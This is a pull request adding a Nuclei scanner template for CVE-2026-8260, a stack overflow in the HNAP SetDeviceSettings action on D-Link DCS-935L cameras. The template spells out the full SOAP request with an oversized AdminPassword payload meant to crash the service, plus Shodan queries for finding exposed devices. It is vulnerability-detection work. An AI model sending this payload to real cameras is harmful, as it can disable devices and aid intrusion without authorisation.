### PR TITLE
Add CVE-2026-8260 HNAP SetDeviceSettings overflow template

### DIFF
--- a/http/cves/2026/CVE-2026-8260.yaml
+++ b/http/cves/2026/CVE-2026-8260.yaml
@@ -1,0 +1,81 @@
+id: CVE-2026-8260
+
+info:
+  name: D-Link DCS-935L <= 1.10.01 - HNAP SetDeviceSettings Stack Overflow
+  author: Sercan Okur
+  severity: high
+  description: |
+    D-Link DCS-935L cameras with firmware through 1.10.01 process the HNAP SetDeviceSettings action via /web/cgi-bin/hnap/hnap_service without sufficient bounds checking when decoding a long hexadecimal AdminPassword value, leading to stack memory corruption during AESDecrypt-assisted parsing per public analysis.
+
+    CVE metrics list Privileges Required LOW (authenticated HNAP context). Supply `cookie` and `hnap_auth` from an active HNAP session when probing in that mode (`-var cookie=… -var hnap_auth="…"`). Without them the device typically answers with an authorization fault; this probe is intrusive and may destabilize the web service—use only against assets you own or are authorized to test.
+  impact: |
+    Memory corruption may lead to denial of service on the HTTP/HNAP service or, under the conditions described in referenced research, escalation to remote code execution.
+  remediation: |
+    Restrict management exposure, apply firmware from D-Link addressing this issue once available, and monitor for abnormal HNAP SetDeviceSettings traffic with unusually long AdminPassword fields.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-8260
+    - https://github.com/0xcc12138/DCS-935L-HNAP-Service-CVE
+    - https://vuldb.com/?id.362557
+    - https://www.dlink.com/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-8260
+    cwe-id: CWE-120
+  metadata:
+    max-request: 1
+    vendor: dlink
+    product: dcs-935l_firmware
+    verified: false
+    shodan-query:
+      - http.html:"DCS-935L"
+      - http.title:"DCS-935L"
+  tags: cve,cve2026,dlink,dcs-935l,ip-camera,hnap,soap,soa,setdevicesettings,buffer-overflow,dos,intrusive,authenticated,rce
+
+variables:
+  cookie: ""
+  hnap_auth: ""
+  # Long hexadecimal token (decoded internally to ~384 repetitive bytes); mirrors CVE/PoC length class that triggers unchecked copy in analysed firmware.
+  admin_password_overflow: '{{repeat("41", 384)}}'
+
+http:
+  - raw:
+      - |
+        POST /web/cgi-bin/hnap/hnap_service HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (compatible; Nuclei CVE-Check)
+        SOAPAction: "http://purenetworks.com/HNAP1/SetDeviceSettings"
+        Cookie: {{cookie}}
+        HNAP_AUTH: {{hnap_auth}}
+        Content-Type: text/xml; charset=utf-8
+        Connection: close
+
+        <?xml version="1.0" encoding="utf-8"?>
+        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+          <soap:Body>
+            <SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
+              <DeviceName>nuclei</DeviceName>
+              <ChangePassword>true</ChangePassword>
+              <AdminPassword>{{admin_password_overflow}}</AdminPassword>
+              <PresentationURL>http://127.0.0.1/</PresentationURL>
+            </SetDeviceSettings>
+          </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: or
+
+    matchers:
+      - type: dsl
+        name: upstream-error
+        dsl:
+          - 'status_code >= 500 && status_code <= 504'
+
+      - type: dsl
+        name: transport-abort-indicator
+        dsl:
+          - 'status_code == 0 && len(body)==0'
+
+      - type: dsl
+        name: hnap-style-fault
+        dsl:
+          - 'status_code == 200 && contains(to_lower(body), "fault") && (contains(to_lower(body), "purenetworks") || contains(to_lower(body), "hnap"))'


### PR DESCRIPTION
# Pull request description — CVE-2026-8260

Paste the section below into the GitHub PR body (omit this heading if you prefer).

---

D-Link DCS-935L intrusive check for oversized `AdminPassword` on `/web/cgi-bin/hnap/hnap_service`; optional `cookie` / `hnap_auth` for authenticated probing.

## PR Information

<!-- Explains the information and/or motivation for update or creating this template -->
<!-- Please include any reference to your template if available -->

- Added **CVE-2026-8260** — Nuclei template for D-Link DCS-935L (firmware through 1.10.01 per NVD) HNAP `SetDeviceSettings` overflow class: POST to `hnap_service` with `SOAPAction: http://purenetworks.com/HNAP1/SetDeviceSettings` and a long hexadecimal `AdminPassword` payload (`repeat("41", 384)`), aligned with public analysis / PoC structure.
- **References:**
  - https://nvd.nist.gov/vuln/detail/CVE-2026-8260
  - https://github.com/0xcc12138/DCS-935L-HNAP-Service-CVE
  - https://vuldb.com/?id.362557
  - https://www.dlink.com/

## Template validation

<!-- Clarifies if the validation was done on an actual system for which the template was developed -->
<!-- For vulnerability checks, clarify validation on vulnerable vs patched systems to reduce false positives -->

- [ ] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

**Note:** Template `metadata.verified` is **false**. Only `nuclei -validate` (e.g. Nuclei v3.8.0) was run; no dedicated vulnerable or patched DCS-935L was used for matcher tuning. Check is **intrusive** — may disrupt HNAP/CGI.

### Additional Details (leave blank if not applicable)

<!-- Include nuclei `-debug` output (redacted), Shodan/Fofa/Google queries, Docker, screenshots if helpful -->
<!-- Do NOT include vulnerable host identifiers in pull requests -->

- Template: `http/cves/2026/CVE-2026-8260.yaml`

## Additional References

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
